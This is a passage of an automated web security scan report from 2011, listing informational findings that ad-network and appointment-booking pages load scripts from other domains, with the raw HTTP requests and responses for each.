Referer: http://tag.admeld.com/ad/iframe/3/foxnews/300x250/politics-bottom?t=1302540075598&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html&refer=http%3A%2F%2Fwww.foxnews.com%2Fpolitics%2Findex.html
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=28e98f62-5d80-11e0-a383-003048d6d140&_hmacv=1&_salt=1016472396&_keyid=k1&_hmac=49c9a1c7a60e54918a604e715fbc9e0895bb8091; ih="b!!!!%!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1UC(!!!!#<u]FZ"; pv1="b!!!!%!#Mln!!!/`!$C*N!0Qau!%IEK!!!!$!?5%!*)ekA!w1K*!%oT=!$b`)!'Q(7~~~~~<tePk<ud7-!!!#G!#Ic<!=3^.!$LHQ!/cM[!%:[j!!!!$!?5%!!wM^+!w1K*!%m74!#^:Z!'?JX~~~~~<uB1*~~!$%ST!!oR7!$dkU!1UC(!%`n`!!!!$!?5%!$U=A2![(N+!'mla!'me'~~~~~~<u]FZ<v[,tM.jTN"; bh="b!!!#]!!-O3!!!!(<uwBp!!/xg!!!!'<uwBp!!1Mv!!!!+<te22!!1N=!!!!*<te22!!1NO!!!!*<te22!!?VS!!<NC<td)Q!!L_w!!!!%<uwBt!!NqV!!!!%<uwBp!!PKh!!!!*<te1m!!PL)!!!!*<te1m!!PL`!!!!*<te1m!!Zw`!!!!)<uwBp!!igy!!!!%<uwBp!!j,.!!<NC<td)Q!!jW8!!!!$<u]Fa!!m>h!!!!%<uwBp!!vJ=!!!!'<uwBp!!vpb!!!!#<tdei!!xxe!!!!#<tdei!!yaE!!!!%<uwBt!#$=Z!!!!#<tdei!#$n[!!!!#<tdei!#%v=!!!!#<tdei!#(mB!!!!#<u7R!!#*.a!!!!#<uw3o!#*VS!!!!#<uw3o!#.dO!!!!%<uwBt!#0')!!!!#<tdei!#1*b!!!!%<uwBp!#1*c!!!!%<uwBp!#1*j!!!!'<uwBp!#16I!!<NC<td)Q!#2._!!!!*<te22!#2.i!!!!*<te1m!#3pv!!!!#<u]Bd!#3pw!!!!#<u7R!!#5(U!!!!#<uw:l!#5(X!!!!#<uw3o!#5([!!!!#<uw:l!#5(a!!!!#<uw3o!#5(c!!!!#<uw3o!#?d3!!!!#<tdei!#?d7!!!!#<tdei!#D![!!!!#<u]Bd!#DpD!!!!#<tdei!#Ke)!!!!#<tdei!#M]c!!!!%<uwBt!#Ms!!!!!#<u]Bd!#N+W!!!!'<td-2!#O@L!!<NC<td)Q!#O@M!!<NC<td)Q!#Q+/!!!!%<uwBt!#Q+^!!!!%<uwBt!#Q+o!!!!%<uwBt!#Q+p!!!!%<uwBt!#Q,.!!!!%<uwBt!#RY.!!!!%<uwBt!#SCj!!!!%<uwBt!#SCk!!!!%<uwBt!#XA!!!!!%<uwBt!#Z8E!!!!(<uwBp!#Z`$!!!!'<uwBp!#ZbA!!!!%<uwBp!#ZbX!!!!%<uwBp!#Zea!!!!'<uwBp!#ZjC!!!!%<uwBp!#]W%!!!!%<uwBt!#^Bo!!!!%<uwBt!#`U,!!!!'<uwBp!#`U/!!!!'<uwBp!#`U4!!!!'<uwBp!#`U9!!!!'<uwBp!#`_p!!!!#<tdei!#a,x!!!!%<uwBt!#a3k!!!!%<uwBt!#aG>!!!!%<uwBt!#aH+!!!!#<u]Bd!#b<b!!!!#<uw:l!#b<c!!!!#<uw:l!#b<d!!!!#<uw:l!#b<f!!!!#<uw:l!#b<h!!!!#<uw3o!#b<j!!!!#<uw3o!#b='!!!!#<uw:l!#b=H!!!!#<uw3o!#b=I!!!!#<uw:l!#eRM!!!!#<tdei!#eU%!!!!%<uwBt!#eaO!!!!%<uwBt!#f8c!!!!%<uwBt!#fBj!!!!(<uwBp!#fBk!!!!(<uwBp!#fBm!!!!(<uwBp!#fBn!!!!(<uwBp!#fG+!!!!%<uwBp!#fJ0!!!!#<tdei!#fJf!!!!#<tdei!#fK7!!!!#<tdei!#g=>!!!!%<uwBp!#g=?!!!!%<uwBp!#gHm!!!!%<uwBt!#g[h!!!!%<uwBt!#gb%!!!!'<uwBp!#gu2!!!!#<tePk!#l*=!!!!%<uwBt!#ndC!!!!#<tdei!#ne*!!!!#<tdei!#p#H!!!!%<uwBt!#r<5!!!!'<td-3!#sAb!!!!#<td)R!#sAc!!!!#<td)R!#sAd!!!!#<td)R!#sAf!!!!#<td)R!#sB1!!!!#<td)R!#sBR!!!!#<td)R!#sC4!!!!#<td)R!#sD[!!!!#<td)R!#t:@!!!!*<te22!#tLt!!!!#<td)R!#uR6!!!!)<uwBp!#uR7!!!!(<uwBp!#uR:!!!!)<uwBp!#ust!!!!%<uwBt!#usu!!!!%<uwBt!#v,F!!!!#<tdei!#v,V!!!!#<tdei!#v,X!!!!#<tdei!#wW9!!!!%<uwBt!#wmL!!!!%<uwBt!#wnK!!!!%<uwBt!#wnM!!!!%<uwBt!#xI*!!!!%<uwBt!#xu[!!!!#<u]Bd!#yM#!!!!%<uwBt!$#WA!!!!%<uwBt!$#r<!!!!#<td)R!$$LL!!!!#<u]Fb!$%,!!!!!%<uwBt!$%SB!!!!%<uwBt!$'(]!!!!#<u]Bd!$(!P!!!!#<uwBp"; BX=265jgc96pflsl&b=4&s=b9&t=92

Response

HTTP/1.1 200 OK
Date: Mon, 11 Apr 2011 16:41:19 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
X-RightMedia-Hostname: ad0117.2rm.ac4
Set-Cookie: ih="b!!!!'!*jY=!!!!#<uwBt!/cM[!!!!#<uB1*!0Qau!!!!#<tePk!1UC(!!!!#<u]FZ"; path=/; expires=Wed, 10-Apr-2013 16:41:19 GMT
Set-Cookie: vuday1=d-=>R!4)FWjt)Q>; path=/; expires=Tue, 12-Apr-2011 00:00:00 GMT
Set-Cookie: BX=265jgc96pflsl&b=4&s=b9&t=92; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Mon, 11 Apr 2011 16:41:19 GMT
Pragma: no-cache
Content-Length: 4439
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(4801930);}
</script><SCRIPT LANGUAGE
...[SNIP]...
</SCRIPT>
<script src="http://ads.yimg.com/a/a/1-/jscodes/flash8/lrec_20081114.js"></script>
...[SNIP]...
11.15. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v0/ad?sid=640921&zs=3436385f3630&zx=69&zy=361&ww=1079&wh=1038&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; srh="1%3Aq64FAA%3D%3D"; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0; geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B"; b="%3A%3Adqjd"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D"; vsd=0@2@4da052a4@www.wcax.com; fq="7xiqt%2C1uo0%7Cljdxnj%2C86fx4%2C1uo0%7Cljdxno"

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: vsd=0@3@4da052a5@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:49 GMT
Set-Cookie: fq="7xiqt%2C1uo0%7Cljdxnj%7Cljdxnp%2C86fx4%2C1uo0%7Cljdxno";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:49 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:35:49 GMT
Content-Length: 1765

document.writeln("<html><head><\/head><body leftmargin=0 topmargin=0 bgcolor=\"#FFFFFF\"> <script src='http://ad.turn.com/server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25460691&ahcid=626665&bimpd=oCYq32pIZ44WC2Hj5xaHoLPQdjNgnkrcewOjDo-n1SQYOy60a80tXQLMIYNrPi8F1664kf5wZPsaRNWwVIbAU-eJMESGQq7G9iOXNAB4-MSg_E-gdQPFfwGO456s277eQI6aJFALXQQZneqbwRBx74CSLEVQbXs-IEXofIReOpq_XD26qi_jA_AuAQLWcK-ttHpOdd8gjAewOJMnTQwgdl5QDpDUC-vOZsRPj-MkGa57gszPmsRJAqUr5mT0N-hEt_-OMriirEJtFCEL4pLuKUABz9e_2LD2rWgc-YRgo6IbckKC_LnaN69g0FMX7-TF95NYeOAj5tzKPHATDHK-Cq6UYAKnaMvABgP2u19TIKcpFcmj-iuG9Q60TKRrws-nLPCQNQ1NJ6FtytBorXofoEBJzAJqRQKNCMhmRJVL7kD5k5GE2nYAUMdX6yNdD3svuGdG5chMdF03I6lYieZZRJYjcV-mkQxfnW3r5gh2ZcKhGAdZc50HfofVzLGPk2rHAcwIO0t-v2_oA0KBTl2259oCaDQETNtbnJloB6dPHPasJ_FzMFXQEDgUfSCtUSLicZkyhJiHOcIpAkX2vs7y5mmpiAdOREtMr-N-23iPhXlhUkUCdIkCBVZI3d02yD5E9PTjY9feOgvB3zAi-yxJW2batfVIVycpJBqx_Q1xI6ft_T370WDWWY1SqEwEJwbh2X53MDgW7m98GlAg2q8y7zQH4WG9KeAs_FmnJA3_tygz_AroS6eWPLNVODVq-iRPeSnzq5ViiHXxn7qhO2_sdw&acp=0.01125653140914017'><\/script>
...[SNIP]...
11.16. http://ads2.adbrite.com/v0/ad  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads2.adbrite.com
Path:   /v0/ad

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /v0/ad?sid=640921&zs=3436385f3630&zx=69&zy=360&ww=1079&wh=1038&fl=1 HTTP/1.1
Host: ads2.adbrite.com
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/story.asp?S=503137
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: Apache="168362046x0.743+1301786605x-1180381502"; ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMJKukoJSXm5aUWZYL1KdXWAgA%3D"; srh="1%3Aq64FAA%3D%3D"; vsd=0@1@4d9fa6a8@s7.addthis.com; rb=0:712156:20861280:1iolb30nur9ak:0:742697:20828160:4608069584519221037:0:806205:20882880:97552ab6-5d98-11e0-8434-0025900a8ffe:0:830697:20838240:bf0d68cb-2449-4e5d-8b20-461d8ec850c3:0

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://files.adbrite.com/w3c/p3p.xml",CP="NOI PSA PSD OUR IND UNI NAV DEM STA OTC"
Content-Type: application/x-javascript
Set-Cookie: geo="1%3ADchBDoIwEIXhu8xaTTspmLJVT4AeYDpDCYlYA2gihLv7Ni%2Ff%2Bzf6emo2Woc3NcTOOX%2FEsqMDLSvSrb2DVkZ4Lnl5yq%2BbToqPOgpq5T2s5QM%2FWnDqX%2BD1As5DD2ZnMZ1TSJVFjsqqIkFqs6xdzSHQvv8B";Path=/;Domain=.adbrite.com;Expires=Sat, 16-Apr-2011 12:35:43 GMT
Set-Cookie: b="%3A%3Adqjd";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Set-Cookie: ut="1%3Aq1YqM1KyqlbKTq0szy9KKVayUkrOyLBILzTIKKgxLDDOTjOsMawx0IEJ5iMLFicapSQCBdIKjLNAAjWGpfkGSjpKSYl5ealFmWDTlGprAQ%3D%3D";Path=/;Domain=.adbrite.com;Expires=Tue, 06-Apr-2021 12:35:43 GMT
Set-Cookie: vsd=0@1@4da0529f@www.wcax.com;Path=/;Domain=.adbrite.com;Expires=Mon, 11-Apr-2011 12:35:43 GMT
Set-Cookie: fq="7xiqt%2C1uo0%7Cljdxnj";Path=/;Domain=.adbrite.com;Expires=Sun, 08-Apr-2012 12:35:43 GMT
Connection: close
Server: XPEHb/1.0
Accept-Ranges: none
Date: Sat, 09 Apr 2011 12:35:43 GMT
Content-Length: 1583

document.writeln("<html><head><\/head><body leftmargin=0 topmargin=0 bgcolor=\"#FFFFFF\"> <script src='http://ad.turn.com/server/ads.js?pub=6552261&cch=6553220&code=6554741&l=468x60&aid=25429411&ahcid=595414&bimpd=3MpWR5A2dm4wb86Ost9BgfW2y4laOK6y3xkEgOIfGnUQJqT_Sonlitequ0d-rj9v4_0-7x_M3XPMN0aPyChPXeeJMESGQq7G9iOXNAB4-MSg_E-gdQPFfwGO456s277eQI6aJFALXQQZneqbwRBx74CSLEVQbXs-IEXofIReOpq_XD26qi_jA_AuAQLWcK-tlTKPEPwzWzLjcG0petCQ0kOZWgcTS_a_4u4oxn8pOmVmmTsVmBcqqleqKTdrTbA03dnura1cEVep9swAHPGcQmDe1mufDYlXrR6QZvzdoJcPRmC1M1UJnq3ySHYLSnRICeaMjHg_OzdSuB4jPjPLKpf3Kh44h6DVsc7_xcKnSPja3C8QNQcmEuoh5hLm8UhVLPCQNQ1NJ6FtytBorXofoB62bqhbUx_nuFRMzf2Fprd949Lefsp8QsMgMdbB8_G407eUqjR_zXj68onFm3lvdZYjcV-mkQxfnW3r5gh2ZcKhGAdZc50HfofVzLGPk2rHHwOWv-gGYK-_EdRAynUJQc9OQ0JCH3IRRC2v9iFYyIGsJ_FzMFXQEDgUfSCtUSLiNCZslCDsmK2JC-xdJmz2cjfYrblFN1Vrq7tHBSJG_h8kNDTINHQPQ6af6fnku4BhPQwEcwTA1AnGV4Q2SYTL57oEC7wd4-ropmSQNL3Tn8jt_T370WDWWY1SqEwEJwbhIPZgphozREaBUNGGZK6KHTQH4WG9KeAs_FmnJA3_tygz_AroS6eWPLNVODVq-iRPeSnzq5ViiHXxn7qhO2_sdw&acp=0.027562246532832593'><\/script>
...[SNIP]...
11.17. http://appointron.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://appointron.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET / HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:48:29 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "a47dd6f7488401d302765a78c48b6fec"
X-Runtime: 0ms
Cache-Control: public, max-age=600
X-Varnish: 1740169332
Age: 0
Via: 1.1 varnish
Content-Length: 19491

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Online Appointment Scheduling and Web Schedule Management | Appointron</title>
<m
...[SNIP]...
<link rel="shortcut icon" href="favicon.ico" mce_href="favicon.ico" />
<script src="http://appointron.appspot.com/javascripts/jquery_cufon_font_combo.js"></script>
...[SNIP]...
11.18. http://appointron.com/features  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://appointron.com
Path:   /features

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /features HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.2.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:49:18 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "b471c88a98fe0a0ede9fb6bf136bf68a"
X-Runtime: 0ms
Cache-Control: public, max-age=600
X-Varnish: 1977003219
Age: 0
Via: 1.1 varnish
Content-Length: 13407

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Online Appointment Scheduling and Web Schedule Management | Appointron</title>
<m
...[SNIP]...
<link rel="shortcut icon" href="favicon.ico" mce_href="favicon.ico" />
<script src="http://appointron.appspot.com/javascripts/jquery_cufon_font_combo.js"></script>
...[SNIP]...
11.19. http://appointron.com/login  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://appointron.com
Path:   /login

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /login HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/pricing
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.4.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:49:52 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "8879d27282002ca61af216ed66e18e8a"
X-Runtime: 1ms
Set-Cookie: _base_session=BAh7BzoMY3NyZl9pZCIlZjEzMjVhMzZlNjc0MGFkZjU1MDQyMTBiNzZhOTc5ZTQiCmZsYXNoSUM6J0FjdGlvbkNvbnRyb2xsZXI6OkZsYXNoOjpGbGFzaEhhc2h7AAY6CkB1c2VkewA%3D--587a67a84dd30f49cd5d102ac1c3a7523ee2b049; domain=.appointron.com; path=/; HttpOnly
Cache-Control: private, max-age=0, must-revalidate
X-Varnish: 1977019555
Age: 0
Via: 1.1 varnish
Content-Length: 12153

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Online Appointment Scheduling and Web Schedule Management | Appointron</title>
<m
...[SNIP]...
<link rel="shortcut icon" href="favicon.ico" mce_href="favicon.ico" />
<script src="http://appointron.appspot.com/javascripts/jquery_cufon_font_combo.js"></script>
...[SNIP]...
11.20. http://appointron.com/pricing  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://appointron.com
Path:   /pricing

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /pricing HTTP/1.1
Host: appointron.com
Proxy-Connection: keep-alive
Referer: http://appointron.com/features
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=145216491.1302288506.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=145216491.97359272.1302288506.1302288506.1302288506.1; __utmc=145216491; __utmb=145216491.3.10.1302288506

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Fri, 08 Apr 2011 18:49:38 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
ETag: "c7aa7c55ee76e028741aceaa4d5d4960"
X-Runtime: 12ms
Cache-Control: public, max-age=600
X-Varnish: 1740203535
Age: 0
Via: 1.1 varnish
Content-Length: 10082

<!DOCTYPE HTML>
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=utf-8" />
<title>Online Appointment Scheduling and Web Schedule Management | Appointron</title>
<m
...[SNIP]...
<link rel="shortcut icon" href="favicon.ico" mce_href="favicon.ico" />
<script src="http://appointron.appspot.com/javascripts/jquery_cufon_font_combo.js"></script>
...[SNIP]...
11.21. http://bcp.crwdcntrl.net/px  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://bcp.crwdcntrl.net
Path:   /px

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /px?Yz00OTImcHhpZD05MzA%3D HTTP/1.1
Host: bcp.crwdcntrl.net
Proxy-Connection: keep-alive
Referer: http://bcp.crwdcntrl.net/4/c=492%7Crand=759762185%7Cpv=y%7Crt=ifr
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aud=ABR4nGNgYGDwXRCoy8DAqG9lK%2FmRQZ2BQUBJxY8NKN4LpngugynRbWBK8CuY4mWGyN2EyO2HCEpDeAsh1CKIEj4IL4sBBLgeQ3jpECoRQiWAKf6%2FYIqNF0xxGIEpYTMVEyDFNQOsnU8UokEYTImcgyipBisROA4xxQ1MCT2DODcCwiuG6DsE4ZVAXPYerE9YH0zx%2FoP4wRSi7wDEuf5AHgAyMCmY; cc=ACB4nGNQMDI1SzEzTjIwS7JIMk20SDFJS7SwNEy0ME8xB1KGiQxA4LsgUPf%2F97i7DAyM%2Bla2kh9BYgwczrJKLAwMZxkY%2FgPF3wApRgYGydubQNSX22eAFDNQ%2FCcD3y8GHmUBByY0pUBVjEJbLeF6mH4yMP9iYBbatAlZiOUXA5NS0ky4kRBVTErxXmChdXAhRqFNO5A1MoJVucBVgfgMXDJ16vidHMC7D7%2BCwEXM%2BBVwtU4ioKC%2BAb8CzsfL8SvgTthFSMFO%2FAr4Kt7iVyBrdhG%2FAgCc%2B7Nr; OAID=256d63b06b8b5a8d4fa891a87d791a1a

Response

HTTP/1.1 200 OK
Date: Sat, 09 Apr 2011 12:29:33 GMT
Server: Apache/2.2.8 (CentOS)
X-Powered-By: Servlet 2.4; JBoss-4.0.4.GA (build: CVSTag=JBoss_4_0_4_GA date=200605151000)/Tomcat-5.5
Cache-Control: no-cache
Expires: 0
Pragma: no-cache
P3P: CP=NOI DSP COR NID PSAa PSDa OUR UNI COM NAV
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 1043

<html><body><div><script src="http://tags.crwdcntrl.net/c/368/cc.js"></script>
<script>
function processTargusData(json)
{
if (json != null && json.targus != null) {
   var fireIt = false;

...[SNIP]...
</script>
<script src="http://adadvisor.net/adscores/g.json?sid=9202507693"></script>
...[SNIP]...
11.22. http://cplads.appspot.com/creatives/aio_300_250/GoogleForm_dp.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cplads.appspot.com
Path:   /creatives/aio_300_250/GoogleForm_dp.html

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /creatives/aio_300_250/GoogleForm_dp.html?click_url=http://googleads.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBFTSpqVKgTfayIsjhlQe_uo2ECq3V39oBnZj0wiLAjbcBgPX2HxABGAEg2JK1CzgAUNGf66sGYMnug4jwo-wSsgEMd3d3LndjYXguY29tugEKMzAweDI1MF9hc8gBCdoBLWh0dHA6Ly93d3cud2NheC5jb20vR2xvYmFsL3N0b3J5LmFzcD9TPTUwMzEzN7gCGMgC3b-bHKgDAdEDW-WrP1ZkL_joA9Qq6APGB-gDxAfoA44D9QMAAABE%26num%3D1%26sig%3DAGiWqtyZaV6gso4B-6Xa4n-NKpfXOwasuQ%26client%3Dca-pub-2103553853082603%26adurl%3D HTTP/1.1
Host: cplads.appspot.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-2103553853082603&output=html&h=250&slotname=8163847123&w=300&lmt=1302370546&flash=10.2.154&url=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D503137&dt=1302352546546&bpp=4&shv=r20110330&jsv=r20110321-2&correlator=1302352546602&frm=0&adk=3878574007&ga_vid=316624107.1302352547&ga_sid=1302352547&ga_hid=1770797232&ga_fc=0&u_tz=-300&u_his=7&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1063&bih=1038&ref=http%3A%2F%2Fwww.wcax.com%2FGlobal%2Fstory.asp%3FS%3D503137&fu=0&ifi=1&dtd=296&xpc=mIXxq5O1Gc&p=http%3A//www.wcax.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
ETag: "f-dPwg"
Date: Sat, 09 Apr 2011 12:35:55 GMT
Expires: Sat, 09 Apr 2011 12:45:55 GMT
Content-Type: text/html
Server: Google Frontend
Cache-Control: public, max-age=600
Age: 23
Content-Length: 13989

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml"><head>

<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript">
</script>
...[SNIP]...
11.23. http://fls.doubleclick.net/activityi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://fls.doubleclick.net
Path:   /activityi

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /activityi;src=2507573;type=ads-a681;cat=ads-a941;ord=1;num=8143914125394.076? HTTP/1.1
Host: fls.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.google.com/services/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c5d378e350000ac|2772334/532299/15066|t=1301786578|et=730|cs=x6xej_ec

Response

HTTP/1.1 200 OK
X-Frame-Options: ALLOWALL
Server: Floodlight
Date: Sat, 09 Apr 2011 00:16:53 GMT
Expires: Sat, 09 Apr 2011 00:16:53 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Content-Type: text/html
X-XSS-Protection: 1; mode=block
Content-Length: 2098

